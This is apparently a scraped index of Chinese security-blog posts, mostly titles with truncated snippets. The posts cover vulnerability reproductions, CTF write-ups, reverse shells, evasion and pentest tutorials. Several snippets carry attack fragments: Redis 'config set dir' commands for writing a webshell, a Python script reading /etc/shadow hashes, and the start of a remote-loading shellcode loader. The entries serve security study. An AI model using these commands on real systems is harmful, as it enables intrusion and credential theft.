文章目录 1、跨站脚本攻击1.1、漏洞描述1.2、漏洞原理1.3、漏洞危害1.4、漏洞验证1.5、漏洞分类1.5.1、反射性XSS1.5.2、存储型XSS1.5.3、DOM型XSS 2、XSS攻防2.1、XSS构造2.1.1、利用<>2.1.2、JavaScript伪协议2.1.3、时间响应 2.2、XSS变形方式2.2.1、大小写转换2.2.2…

SSRF漏洞实战

文章目录 SSRF概述SSRF原理SSRF 危害PHP复现SSRF漏洞检测端口扫描内网Web应用指纹识别攻击内网应用读取本地文件 Weblogic SSRF--Getshell复现SSRF攻击Redis原理漏洞检测端口扫描复现翻车，请看官方复现教程注入HTTP头，利用Redis反弹shell SSRF防御过滤输…

SQL Server 2012下载和安装配置详细教程手册

SQL Server 2012 下载和安装详细教程目录 SQL Server 2012 下载和安装详细教程1、软件下载2、软件安装3、软件验证 1、软件下载 （1）官网地址 https://www.microsoft.com/zh-cn/sql-server/sql-server-downloads （可能不太行） &a…

AES+base64+远程加载----ConsoleApplication811项目

ConsoleApplication9.cpp // ConsoleApplication9.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。 //#include <iostream> #include <Windows.h> #include <wininet.h> #include "base64.h" #include "AES.h" …

腾讯云coding平台平台inda目录遍历漏洞复现

前言其实就是一个python的库可以遍历到，并不能遍历到别的路径下，后续可利用性不大，并且目前这个平台私有部署量不多，大多都是用腾讯云在线部署的。 CODING DevOps 是面向软件研发团队的一站式研发协作管理平台，提供…

NATAPP使用详细教程（免费隧道内网映射）

NATAPP - https://natapp.cn/tunnel/lists NATAPP 在开发时可能会有将自己开发的机器上的应用提供到公网上进行访问，但是并不想通过注册域名、搭建服务器；由此可以使用natapp（内网穿透） 购买免费隧道修改隧道配置看自己的web…

pikachu——一、暴力破解模块通关教程

pikachu 一、靶场介绍二、Burte Force（暴力破解）概述三、基于表单的暴力破解四、验证码绕过（on client）五、验证码绕过（on server）六、token防爆破？ 一、靶场介绍靶场搭建： https:…

调用自实现MyGetProcAddress获得CreateFileA函数并调用创建写入文件

写文件如下 #include <iostream> #include <Windows.h>typedef HANDLE(WINAPI* CreateFileAFunc)(LPCSTR, DWORD, DWORD, LPSECURITY_ATTRIBUTES, DWORD, DWORD, HANDLE);DWORD MyGetProcAddress(_In_ HMODULE hModule,_In_ LPCSTR lpProcName ){PIMAGE_DOS_HEADE…

浅谈红队资产信息收集经验

文章目录子公司资产收集备案号|官网收集子域名|ip收集fofa灯塔ARLX情报社区资产确认目录扫描Google Hacking绕过CDNnmap端口扫描参数技巧其他常用工具子公司资产收集红蓝对抗中往往只会给你目标企业的名称，以及对应的靶标系统地址，而很少有直接从靶标…

ToBeWritten之VSOC安全运营

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历转移发布平台通知：将不再在CSDN博客发布新文章，敬…

ToBeWritten之针对 Car ATTCK 的攻防矩阵

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历转移发布平台通知：将不再在CSDN博客发布新文章，敬…

如何检测勒索软件攻击

什么是勒索软件勒索软件又称勒索病毒，是一种特殊的恶意软件，又被归类为“阻断访问式攻击”（denial-of-access attack），与其他病毒最大的不同在于攻击方法以及中毒方式。攻击方法：攻击它采用技术手段限制…

利用条件竞争突破优惠券仅能使用一次逻辑限制

Portswigger练兵场之条件竞争目录 Portswigger练兵场之条件竞争🦄条件竞争-突破一次逻辑限制🚀实验前置必要知识点🏆实验要求⚡️渗透开始1. 站点分析2. 登录3.日志探查4.功能点探究5.完成实验修复方案 🦄条件竞争-突破一次逻辑…

反弹shell总结

反弹shell总结讲在前面说的话：反弹shell总结nc反弹shell正向shell反向shell正向shell（服务端被攻击）：反向shell（客户端被攻击）：无nc反弹shellpython反弹shellbash反弹shellPHP反向shellPerl反向shellJava反弹shellsocat 反弹shellRuby反弹shellLua反弹shellAwk 反弹she…

Web安全——信息收集下篇

Web安全一、网络空间搜索引擎二、扫描敏感目录/文件1、御剑2、7kbstorm3、bbscan4、dirmap5、dirsearch6、gobuster7、网站文件三、扫描网页备份四、网站头信息收集五、敏感文件搜索1、GitHub搜索2、Google-hacking3、wooyun漏洞库4、网盘搜索5、社工库6、网站注册信息7、js敏…

对于docker共享ipc的测试

前言 postgres没删除成功，得试试db2 参考 Docker Container IPC Share | 海胆阶段s Blog (chengdol.github.io) docker_ipc/docker_ipc_test at main wenjing1993/docker_ipc GitHub

什么是间谍软件恶意软件？

攻击者利用此类软件从受感染的设备中收集和传输信息。这可能包括个人、银行和用户凭证（社交网络、流媒体服务、邮件等的登录名和密码），以及设备内存中的文件。在间谍软件的帮助下，欺诈者还可以窃取公司凭证，不仅伤害…

蓝凌EIS智慧协同平台saveImg接口存在任意文件上传漏洞

蓝凌EIS智慧协同平台saveImg接口存在任意文件上传漏洞一、蓝凌EIS简介二、漏洞描述三、影响版本四、fofa查询语句五、漏洞复现六、深度复现1、发送如花2、哥斯拉直连免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者…

1.6 基本安全设计准则

思维导图： 1.6 基本安全设计准则笔记目标：理解和遵循一套广泛认可的安全设计准则，以指导保护机制的开发。主要准则： 机制的经济性：安全机制应设计得简单、短小，便于测试和验证，减少漏洞和降…

在安装和配置DVWA渗透测试环境遇到的报错问题

安装环境前面的安装我参考的这个博主：渗透测试漏洞平台DVWA环境安装搭建及初级SQL注入-CSDN博客修改bug 1.首先十分感谢提供帮助的博主，搭建DVWA Web渗透测试靶场_dvwa 白屏-CSDN博客，解决了我大多数问题，报错如下&#xff1…

python读取shadow文件脚本

python读取shadow文件脚本该脚本源代码为kali中执行的源代码 from dataclasses import fieldswith open(/etc/shadow,r)as file:for line in file:listline.split(:)if list[1]!"*" and list[1]!"!" and list[1]!"!*":paslist[1].split($)sal…

安装eNSP详细步骤

1.步骤一先下载WinPcap、wireShark、virtualBox链接：https://pan.baidu.com/s/1aY3XPtNK2kEWVuozOSa5gw 提取码：9di31.1 安装 WinPcap 因为wireshark使用WinPCAP作为接口(现在普遍使用的是Npcap),直接与网卡进行数据报文交换。 wireshark基于winpcap处…

SHCTF2023 山河CTF Reverse Week3 --- ststst easyre WP详解

文章目录 [WEEK3]ststst[WEEK3]easyre [WEEK3]ststst 64 bit 的 ELF 文件 sub_400763点进去看看 mprotect ，这个这一题是SMC TEA的考察，我写过一篇关于 SMC学习网鼎杯jocker 可以使用idapython写脚本自动修复，也可以使用动态调试&#x…

EDUSRC-记一次登录过程中的信息泄露

语法 org"China Education and Research Network Center" && body"登录" 起因在进行登录测试的时候发现一处登录框闲来无事抓个包输入个账号密码问题是后端没抓到包，但是前端跳出了提示，账号密码错误这极大的可能是…

1.8 网络安全模型

思维导图： 1.8 网络安全模型笔记： 网络安全模型核心概念: 消息在Internet上从发送方传送至接收方，涉及到源地址、目的地址、通信协议（如TCP/IP）的使用。信息交换的双方需要合作保证交换的可靠性。安全技术核心组成…

网络工程师重点总结

网络工程师重点 OSI七层模型三层网络结构信息保护安全等级划分子网作用帧长度IPv4和IPv6自动隧道和手动隧道WLAN接入安全控制中，采用的安全措施看冲突域和广播域数量递归查询和迭代查询区别三次握手和四次握手 OSI七层模型 1.物理层：实现实际终端信号的…

透视俄乌网络战之七：俄乌网络战的思考

俄乌网络战的思考 1. 网络行动和军事行动的关系2. 俄乌网络战的启示 1. 网络行动和军事行动的关系关于网络行动和军事行动间的直接联系，主要有以下三个观点： （1）网络行动替代常规军事行动替代理论的倡导者认为，国…

【网络安全 --- 任意文件上传漏洞靶场闯关 6-15关】任意文件上传漏洞靶场闯关，让你更深入了解文件上传漏洞以及绕过方式方法，思路技巧

一，工具资源下载百度网盘资源下载链接地址： 百度网盘请输入提取码百度网盘为您提供文件的网络备份、同步和分享服务。空间大、速度快、安全稳固，支持教育网加速，支持手机端。注册使用百度网盘即可享受免费存储空间https://pan…

Solidity 小白教程：5. 变量数据存储和作用域 storage_memory_calldata

Solidity 小白教程：5. 变量数据存储和作用域 storage_memory_calldata Solidity 中的引用类型引用类型(Reference Type)：包括数组（array），结构体（struct）和映射（mapping&#xff…

【送书福利-第十七期】用“价值”的视角来看安全：《构建新型网络形态下的网络空间安全体系》

😎 作者介绍：我是程序员洲洲，一个热爱写作的非著名程序员。CSDN全栈优质领域创作者、华为云博客社区云享专家、阿里云博客社区专家博主、前后端开发、人工智能研究生。公粽号：程序员洲洲。 🎈 本文专栏：本文…

您的计算机已被.halo勒索病毒感染？恢复您的数据的方法在这里！

导言： 在当今数字时代，网络安全已经成为了我们生活和工作中不可或缺的一部分。然而， .Halo 勒索病毒的出现，使网络威胁变得更加真切和具体。本文91数据恢复将深入介绍 .Halo 勒索病毒的危害，详细探讨如何高效地恢复被其…

网络安全（黑客）渗透测试学习路线

相信很多新手都会遇到以下几个问题 1.零基础想学渗透怎么入手？ 2.学习web渗透需要从哪里开始？ 这让很多同学都处于迷茫状态而迟迟不下手，就在此贴给大家说一下web渗透的学习路线，希望对大家有帮助以下是免费的基础渗透测试入门…

内网隧道代理技术（二十）之 CS使用HTTP代理上线不出网机器

CS使用HTTP代理上线不出网机器 CS工具自带上线不出网机器如图A区域存在一台中转机器，这台机器可以出网，这种是最常见的情况。我们在渗透测试的过程中经常是拿下一台边缘机器，其有多块网卡，边缘机器可以访问内网机器，内网机器都不出网。这种情况下拿这个边缘机器做中转，…

sqlmap中文文档

这是 sqlmap -hh的翻译，后续可能会对参数进行详细的示例 sqlmap 普通选项 -h, --help # 显示基本帮助信息并退出 -hh # 详细帮助信息 --versino # 版本 -v # 日志详细级别 0-60：只显示python错误以及严重的信息。1：同时显示基本信…

苹果电脑要安装杀毒软件吗？mac用什么杀毒软件好？

对于这个问题让人很是纠结，Mac不需要杀毒这个理论一直都深入人心，Mac OS X权限管理特性可以防毒的说法也一直甚嚣尘上，很多小伙伴如我一样搞不清楚到底要不要安装杀毒软件。，毕竟当前个人信息安全泄露泛滥不穷的年代，我…

攻防世界-Hear-with-your-Eyes

原题解题思路是一个没有后缀的文件，题目提示要用眼睛看这段音频，notepad打开文件，没什么东西。加后缀zip再解压看看。使用Audacity打开音频文件

车内信息安全技术-安全技术栈-软件安全

操作系统 1.隔离技术信息安全中的隔离技术通常指的是将不同安全级别的信息或数据隔离开来，以保护敏感信息不受未授权的访问或泄露。在操作系统中，常见的隔离技术包括：虚拟化技术：通过虚拟化软件，将物理计算机分割成多个独立的虚拟计算机，每个虚拟计算机都可以运行独立的…

虹科分享 | MKA：基于先进车载网络安全解决方案的密钥协议

MKA作为MACsec的密钥协议，具有安全、高效、针对性强的特点，为您的汽车ECU通讯创建了一个安全的通信平台，可以助力您的各种汽车创新项目！ 虹科方案 | 什么是基于MACsec的汽车MKA 一、MACsec在汽车行业的应用在以往的文章中&#…

【漏洞复现】H3C路由器信息泄露任意用户登录

漏洞描述通过访问特地址得到密码可进行登录。免责声明技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得利用网络从事危害国家安全、荣誉和利益，未经授权请勿利用文章中…

网络安全岗位面试经验总结（附面试题）

思路流程: 信息收集服务器的相关信息（真实ip，系统类型，版本，开放端口，WAF等） 网站指纹识别（包括，cms，cdn，证书等），dns记录 whois信…

【linux命令讲解大全】098.网络文件传输协议介绍及常用命令

文章目录 sftp-server补充说明语法 sftp补充说明语法选项参数实例建立连接获取文件下载到指定路径上传本地文件到服务器指定路径 tftp补充说明语法选项参数实例从零学 python sftp-server sftp协议的服务器端程序补充说明 sftp-server命令是一个sftp协议的服务器端程序&…

网络安全（黑客）自学路线，了解什么是黑客

谈起黑客，可能各位都会想到：盗号，其实不尽然；黑客是一群喜爱研究技术的群体，在黑客圈中，一般分为三大圈：娱乐圈技术圈职业圈。娱乐圈：主要是初中生和高中生较多，玩网恋…

【漏洞复现】深信服科技EDR平台存在任意用户登录漏洞

漏洞描述深信服终端检测响应平台EDR,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。该EDR系统存在任意用户登录漏洞，攻击者通过漏洞可以登录系统后台并获取服务器的敏感信息…

【漏洞复现】网互联路由器存在密码泄露

漏洞描述蜂网互联-让链接无限可能，灵活的多线分流，强大的策略分流，灵活调度各种软件应用，深度识别系统，各种应用一网打尽，灵活调整优先级，最简单的路由器，简洁易学的配置&#xff…

免杀对抗-ShellCode上线+回调编译执行+混淆变异算法

C/C --ShellCode-免杀对抗介绍： shellcode是一段用于利用软件漏洞而执行的代码，shellcode为16进制的机器码，因为经常让攻击者获得shell而得名。我们经常在CS里面生成指定编程语言的payload，而这个payload里面就是一段十六进制的机…

浅谈redis未授权漏洞

redis未授权漏洞利用条件版本比较高的redis需要修改redis的配置文件，将bind前面#注释符去掉，将protected-mode 后面改为no 写入webshell config get dir #查看redis数据库路径 config set dir web路径# #修改靶机Redis数据库路径 config set dbfilen…

Nginx 解析漏洞

文章目录 Nginx 解析漏洞1. 空字节漏洞1.1 漏洞描述1.2 漏洞复现1.3 修复方案 2. Nginx 解析漏洞复现2.1 漏洞描述2.2 漏洞复现2.3 获取GetShell2.4 修复方案 3. Nginx 文件名逻辑漏洞3.1 漏洞描述3.2 漏洞原理3.3 漏洞复现3.3.1 环境启动3.3.2 漏洞验证 3.4 漏洞利用3.5 修复方…

sql注入漏洞（CVE-2022-32991）

简介 CVE-2022-32991是Web Based Quiz System v1.0版本中存在的SQL注入漏洞，该漏洞源于welcome.php中的eid参数缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令窃取数据库敏感数据。打开靶场环境，如下 1.进行注册登录 2.点击任意一处…

upload-labs/Pass-07 未知后缀名解析漏洞复现

upload-labs/Pass-07 漏洞复现页面： 我们看到有一个图片上传功能。我们上传一个png文件发现能够成功上传，那其他文件呢，如php文件。我们看一下是否能上传一个php文件： php文件内容： <?phpeval($_REQUEST[]…

Apache HTTPD （CVE-2017-15715）换行解析漏洞复现

Apache HTTPD 换行解析漏洞 CVE-2017-15715漏洞简介组件版本漏洞名称 Apache HTTPD 换行解析漏洞（CVE-2017-15715） 漏洞描述 Apache HTTPD是一款HTTP服务器，它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞&…

ssrf伪造服务器请求

一.搭建环境 1.进入目录 2.打开容器如果没有就会下载 docker拉去环境 3. 地址 4.外部地址 5.使用发现报错 6.抓包 7.发现公网可以使用 9.内网地址

Apache HTTPD 多后缀名解析漏洞复现

什么是多后缀名解析漏洞加粗样式: 多后缀名解析漏洞（Multiple Extension Handling Vulnerability）指的是一种安全漏洞，发生在某些操作系统或网络服务中的文件扩展名处理机制中。这种漏洞的本质是当文件具有多个后缀名（例如file.…

50个渗透(黑客)常用名词及解释

目录前言一.渗透测试二.网络安全三.安全攻击四.黑客工具五.渗透方法六.网络钓鱼七.攻击技术八.其他名词总结前言网络安全是当今互联网时代不可忽视的重要议题。随着科技的发展，黑客渗透技术也日益复杂和潜在危险。为了加强对网络安全的认识&…

vulnhub靶机Brainpan

主机发现 arp-scan -l 端口扫描 nmap --min-rate 10000 -p- 192.168.21.156 服务扫描 nmap -sV -sT -O -p9999,10000 192.168.21.156 这个地方感到了有点不对劲，python起来的一个web端口漏洞扫描 nmap --scriptvuln -p9999,10000 192.168.21.156 意料之中&…

linux常用命令及解释大全（一）

目录一、系统信息二、关机、重启及登出三、文件和目录 3.1 导航命令 3.2 查看命令 3.3 创建和删除命令 3.4 复制和链接命令 3.5 其他命令四、文件搜索五、挂载文件系统六、磁盘空间七、用户和群组总结前言 Linux 是一种自由和开放源代码的操作系统&…

一个CVE漏洞预警知识库

CVE 0x01 免责声明本仓库所涉及的技术、思路和工具仅供安全技术研究，任何人不得将其用于非授权渗透测试，不得将其用于非法用途和盈利，否则后果自行承担。无exp/poc，部分包含修复方案 0x02 项目导航 2022.12 CVE-2022-3328&a…

提高效率：VMLogin浏览器免密码同时登录多个Facebook账号

无论是媒体运营者还是作为日常使用，几乎每个人都会拥有多个社交媒体账号，其中多个Facebook账号无疑是最常见的之一。多个Facebook账号的好处是显而易见的，可以在不同的身份、角色下展示自己，拓宽人脉圈子，提升个人或品…

汽车信息安全导图

尊敬的读者们，欢迎来到我的信息安全专栏。在这个专栏中，我将结合我在信息安全领域的开发经验，为大家深入浅出地讲解信息安全的重要性和相关知识点。在数字化时代，信息成为了我们生活中不可或缺的一部分。我们的个人信息、交易数据、社交网络、公司机密等都以电子形式存储…

Fastjson_1.2.24_unserialize_rce漏洞复现

fastjson_1.2.24_unserialize_rce 说明内容漏洞编号CNVD-2017-02833漏洞名称FastJson < 1.2.24 远程代码执行漏洞评级高危影响范围1.2.24漏洞描述通过parseObject/parse将传入的字符串反序列化为Java对象时由于没有进行合理检查修复方案升级组件，打补丁&#xf…

phpcmsV9.6.0sql注入漏洞分析

目录前言环境准备漏洞点看一看parse_str函数看一看sys_auth函数看一看get_one函数全局搜索sys_auth($a_k, ENCODE) 查看哪里调用了 set_cookie 查看safe_replace函数判断登录绕过 index的业务加载modules/wap/index.php 加载modules/attachment/attachme…

某堡垒机SQL注入漏洞

声明本文仅用于技术交流，请勿用于非法用途由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。一、概述中远麒麟堡垒机能够提供细粒度的访问控制,最大限度保护用户资…

【漏洞复现】广联达办公OAsql+文件上传+弱口令

漏洞描述广联达办公OA是一款综合办公自动化解决方案，旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具，帮助企业管理和处理日常办公任务、流程和文档。默认弱口令admin password，后面就不提了。免责声明技术文章仅供参考，任何个人和组织使用网络应当…

业务安全及案例实战

文章目录业务安全1. 业务安全概述1.1 业务安全现状1.1.1 业务逻辑漏洞1.1.2 黑客攻击目标 2. 业务安全测试2.1 业务安全测试流程2.1.1 测试准备2.1.2 业务调研2.1.3 业务建模2.1.4 业务流程梳理2.1.5 业务风险点识别2.1.6 开展测试2.1.7 撰写报告 3. 业务安全经典场景3.1 业务…

“熊猫杯” | 赛宁网安获网络安全优秀创新成果大赛优胜奖

9月11日，四川省2023年国家网络安全宣传周正式启动。由四川省委网信办指导，中国网络安全产业联盟（CCIA）主办，成都信息工程大学、四川省网络空间安全协会承办的“2023年网络安全优秀创新成果大赛—成都分站赛(暨四川省‘…

我终于搞懂了数字签名和数字证书！

👨‍🏫 考点：数字签名，数字证书 ⭐️ 数字签名的概念、原理 --- title: 明文传输 --- graph LRsubgraph server [B]B(["响应正文"])endsubgraph browser [A]A(["请求正文"])endbrowser -- 请求 --> serve…

CTFhub_SSRF靶场教程

CTFhub SSRF 题目 1. Bypass 1.1 URL Bypass 请求的URL中必须包含http://notfound.ctfhub.com，来尝试利用URL的一些特殊地方绕过这个限制吧 1.利用?绕过限制urlhttps://www.baidu.com?www.xxxx.me 2.利用绕过限制urlhttps://www.baidu.comwww.xxxx.me 3.利用斜…

buuctf crypto 【[HDCTF2019]basic rsa】解题记录

1.打开文件 2.套用脚本 import random from binascii import a2b_hex,b2a_hex p 262248800182277040650192055439906580479 q 262854994239322828547925595487519915551 n p * q def multiplicative_inversr(a,b): x 0 y 1 lx 1 ly 0 oa a ob…

Solidity 小白教程：17. 库合约站在巨人的肩膀上

Solidity 小白教程：17. 库合约站在巨人的肩膀上这一讲，我们用ERC721的引用的库合约String为例介绍solidity中的库合约（library），并总结了常用的库函数。库函数库函数是一种特殊的合约，为了提升solid…

张雪峰说网络空间安全专业

网络空间安全专业是一个涵盖了计算机科学、信息安全、法律等多个领域的学科，旨在研究保护网络空间的信息系统和数据不被非法侵入、破坏、篡改、泄露的技术和管理手段。网络安全专业的重要性随着网络技术的发展，网络安全问题也日益凸显，黑客…

天空卫士加入工信部重点实验室大数据安全工作组

2023年9月7日，由中国国际数字经济博览会组委会主办，工业和信息化部网络安全产业发展中心（工业和信息化部信息中心）承办的“2023中国国际数字经济博览会——网络和数据安全产业大会”在河北正定成功举办。在本次大会上，…

Pikachu Burte Force（暴力破解）

一、Burte Force（暴力破解）概述 “暴力破解”是一攻击具手段，在web攻击中，一般会使用这种手段对应用系统的认证信息进行获取。其过程就是使用大量的认证信息在认证接口进行尝试登录，直到得到正确的结果。为了提高…

Say0l的安全开发-代理扫描工具-Sayo-proxyscan【红队工具】

写在前面终于终于，安全开发也练习一年半了，有时间完善一下项目，写写中间踩过的坑。安全开发的系列全部都会上传至github，欢迎使用和star。工具链接地址 https://github.com/SAY0l/Sayo-proxyscan 工具简介 SOCKS4/SOCKS4…

Vulnhub系列靶机-THM-ContainMe-v4

文章目录 Vulnhub系列靶机-THM-ContainMe-v41. 信息收集1.1 主机扫描1.2 端口扫描1.3 目录爆破 2. 漏洞探测3. 漏洞利用4. 权限提升 Vulnhub系列靶机-THM-ContainMe-v4 1. 信息收集 1.1 主机扫描 arp-scan -l1.2 端口扫描 nmap -A -p- 192.168.188.188端口扫描出来了&#…

2023年“羊城杯”网络安全大赛决赛 AWDP [Break+Fix] Web方向题解wp 全

终于迎来了我的第一百篇文章。这次决赛赛制是AWDP。BreakFix，其实就是CTFFix，Fix规则有点难崩。Break和Fix题目是一样的。总结一下：败北，还是太菜了得继续修炼一下。一、Break ezSSTI 看到是SSTI，焚靖直接一把梭…

透视俄乌网络战之二：Conti勒索软件集团（下）

透视俄乌网络战之一：数据擦除软件透视俄乌网络战之二：Conti勒索软件集团（上） Conti勒索软件集团（下） 1. 管理面板源代码2. Pony凭证窃取恶意软件3. TTPs4. Conti Locker v2源代码5. Conti团伙培训材料6. T…

信息安全等级保护五个标准步骤（信息安全等级保护基本要求）

本文目录信息安全等级保护二级的认证（等保二级）的流程？ 一级等级保护建设的流程是什么？ 什么是进行等级确定和等级保护？ 一等一般等级保护建设的流程是？ 网络安全等级保护1.0主要内涵？ 信…

buuctf crypto 【密码学的心声】解题记录

1.打开可以看到一个曲谱 2.看到曲谱中的提示埃塞克码可以想到ascii码，没有八可以联想到八进制，而八进制又对应着三位的二进制，然后写个脚本就好了 oct [111,114,157,166,145,123,145,143,165,162,151,164,171,126,145,162,171,115,165,143,…

SQL注入——二次注入漏洞

文章目录 SQL注入——二次注入漏洞1. 二次注入原理2. 二次注入需要具备的两个条件3. 二次注入实例4. 总结 SQL注入——二次注入漏洞 1. 二次注入原理在第一次插入恶意数据的时候，只是对其中的特殊字符进行了转义，在写入数据库的时候还是原来的字符&am…

CVE漏洞库网址

cve漏洞库网站阿里云漏洞库 https://avd.aliyun.com/nvd/listtenable漏洞库(nessus) https://www.tenable.com/cve/searchhttps://cve.mitre.org/cve/search_cve_list.htmlhttps://nvd.nist.gov/vuln/search

[ACTF2020 新生赛]Upload 1

题目环境： 仍旧是文件上传漏洞这道题和上一道大差不差、大同小异、这里不再赘述。 [极客大挑战 2019]Upload 1：https://blog.csdn.net/m0_73734159/article/details/134267317?spm1001.2014.3001.5501 区别在于本题需要在抓包数据里面改文件后缀&#…

文件怎么加密丨4种文件加密方法盘点

一、如何给word文件加密？ 1. 打开word，点击“文件”。 2. 点击“信息”，选择“保护文档”，并选择“用密码进行加密”。 3. 在弹出的小窗口，我们可以添加密码，并点击确定即可。二、如何给excel表格进行加…

攻防世界题目练习——Web引导模式（四）（持续更新）

题目目录 1. shrine2. very_easy_sql 1. shrine 打开网页题目内容如下： 是一段代码，我们把它还原一下： import flask import osapp flask.Flask(__name__) app.config[FLAG] os.environ.pop(FLAG) #这里应该是将config配置里的FLAG字段设…

一次简单的测试

文章现写的，部分内容有些着急 0x01 测试过程开局登录框，没有测试SQL注入与XSS(菜鸟，测也测不出来。) 有system用户，尝试弱口令，无果！ 直接namp来一下子端口探测吧发现有3306与8888 3306 mysql测试 88…

xray：漏洞扫描利器

简介长亭科技旗下的一款网络安全漏洞扫描工具，用于检测和评估web应用程序的安全性。具有一下特点：检测速读快、检查范围广、代码质量高、高级可定制以及安全无危害。属于不开源的项目，用户直接下载xray的可执行文件，即可运行该工…

智能网联汽车基础软件信息安全需求分析

目录 1.安全启动 2.安全升级 3.安全存储 4.安全通信 5.安全调试 6.安全诊断 7.小结 1.安全启动对于MCU，安全启动主要是以安全岛BootROM为信任根，在MCU启动后，用户程序运行前，硬件加密模块采用逐级校验、并行校验或者混合校…

用友U8 Cloud 反序列化RCE漏洞复现

0x01 产品简介用友U8 Cloud是用友推出的新一代云ERP，主要聚焦成长型、创新型企业，提供企业级云ERP整体解决方案。 0x02 漏洞概述用友U8 Cloud存在多处（FileManageServlet和LoginVideoServlet）反序列化漏洞，系统未将…

Goby 漏洞发布｜用友 U8 Cloud ActionHandlerServlet 远程代码执行漏洞

漏洞名称： 用友 U8 Cloud ActionHandlerServlet 远程代码执行漏洞 English Name：Yonyou U8 Cloud ActionHandlerServlet Api Deserialize Code Execution Vulnerability CVSS core: 9.8 影响资产数： 14073 漏洞描述： 用友 U8…

网站被黑跳转到黄色页面怎么办

这种情况出现的频率会比较高，大部分呢，都是来自于灰产页面，用最小的投入啊，换最大的回报。为什么这么说，很多企业家呢，都会做竞价排名，来获客，相当于竞价每次点击产生的费用&#xf…

BUUCTF_练[CISCN2019 华北赛区 Day1 Web5]CyberPunk

[CISCN2019 华北赛区 Day1 Web5]CyberPunk 文章目录 [CISCN2019 华北赛区 Day1 Web5]CyberPunk掌握知识解题思路代码分析paylaod的构建正式解题关键paylaod 掌握知识 php伪协议读取文件；源码泄露hint ；代码审计发现二次注入点；SQL语句的…

narak靶机攻略

narak靶机攻略扫描渗透 cewl http://10.4.7.158 > use1.txthydra -L use1.txt -P use1.txt http-get://10.4.7.158/webdav -V -t 50 -fyamdoot:Swargcadaver http://10.4.7.158/webdav<?php $ip10.4.7.158; $port12138; $sock fsockopen($ip, $port); $descriptors…

紧急：发现NGINX Ingress Controller for Kubernetes中的新安全漏洞

导语大家好，今天我要向大家紧急报告一则消息：我们在NGINX Ingress Controller for Kubernetes中发现了三个新的安全漏洞！这些漏洞可能被黑客利用，从集群中窃取机密凭据。在本文中，我们将详细介绍这些漏洞的细节&#…

网络安全（黑客）-小白自学笔记

1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 2.网络安全市场一、是市场需求量高； 二、则是发展相对成熟…

通过Google搜索广告传送的携带木马的PyCharm软件版本

导语最近，一起新的恶意广告活动被发现，利用被入侵的网站通过Google搜索结果推广虚假版本的PyCharm软件。这个活动利用了动态搜索广告，将广告链接指向被黑客篡改的网页，用户点击链接后下载的并不是PyCharm软件，而是多种…

DC系列 DC:2

DC:2 文章目录 DC:2信息收集IP收集网页收集 rbash绕过提权信息收集 IP收集使用arp-scan 对网段进行扫描得到目标机ip之后使用nmap -A -p- -sV -sT 10.4.7.21对该ip进行详细扫描可以看到该目标机开放着ssh和http服务得到端口7744和80 网页收集访问网页发现无法访问 …

SHCTF 未出题目复盘

crypto week1 立正逆序得到 :V Qook at you~ this is flag: EmxhE8tERKAfYAZ6S636dIWuEK46ZK4yRBdNdK4uRKd4 decode it 中间那串像b64 解码解不出什么猜测还要rotate Emxh 和 flag编码后的前几位比较接近考虑大写字母需要继续偏移对大写字母处理完后得到 :Q Look at you…

多伦多公共图书馆遭遇周末网络攻击，服务中断

多伦多公共图书馆（TPL）在10月28日星期六遭遇网络攻击后，警告称其许多在线服务已经中断。作为加拿大最大的公共图书馆系统，TPL通过多伦多市内的100个分馆为人们提供1200万本图书的借阅服务。图书馆拥有120万注册会员，…

2023SHCTF web方向wp

1.ezphp 看一眼，你大爷，啥玩意都给我过滤完了。还好下面有preg_replace()/e，会把replacement当作php语句执行传参pattern.*， .*表示任意字符，code{${phpinfo()}} ，为什么这样写，因为,print_…

BUUCTF ningen 1

BUUCTF:https://buuoj.cn/challenges 题目描述： 人类的科学日益发展，对自然的研究依然无法满足，传闻日本科学家秋明重组了基因序列，造出了名为ningen的超自然生物。某天特工小明偶然截获了日本与俄罗斯的秘密通信，文…

python脚本-requests模块

python脚本-requests模块模拟浏览器 import requests url"http://10.9.47.154/php/arrayprac/get.php" headers {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Sa…

phpstudy_2016-2018_rce

phpstudy_2016-2018_rce 代码 import base64 import requests import sysbanner""" PHPStudy_2016-2018( ) ( ) ( ) | |_ _ _ ___ | |/) _| | _ _ _ __ | _\ /_ ) /___)| , < /_ | /_…

记一次某学院的未授权渗透过程

文章现写的，部分内容有些着急。 0x01 测试过程开局登录框，没有测试SQL注入与XSS(菜鸟，测也测不出来。) 有system用户，尝试弱口令，无果！ 直接namp来一下子端口探测吧发现有3306与8888 3306 mysql测试…

BUUCTF 另外一个世界 1

BUUCTF:https://buuoj.cn/challenges 题目描述： 下载附件，解压得到一个.jpg图片。密文： 解题思路： 1、这道题我尝试了很多方法，知道看了别人的wp才知道flag在我忽略的地方。将图片在010 Editor中打开，从…

APP攻防--ADB基础

进入app包先使用 adb devices查看链接状态手机连接成功的 adb shell 获取到手机的一个shell 此时想进入app包时没有权限的，APP包一般在data/data/下。没有执行权限，如图 Permission denied 权限被拒绝此时需要手机root，root后输入 su …

【漏洞库】XXL-JOB 默认accessToken权限绕过导致RCE

文章目录漏洞描述漏洞编号漏洞评级影响版本漏洞复现- EXP 编写漏洞挖掘修复建议漏洞描述 XXL-JOB 是一款开源的分布式任务调度平台，用于实现大规模任务的调度和执行。 XXL-JOB 默认配置下，用于调度通讯的 accessToken 不是随机生成的，而…

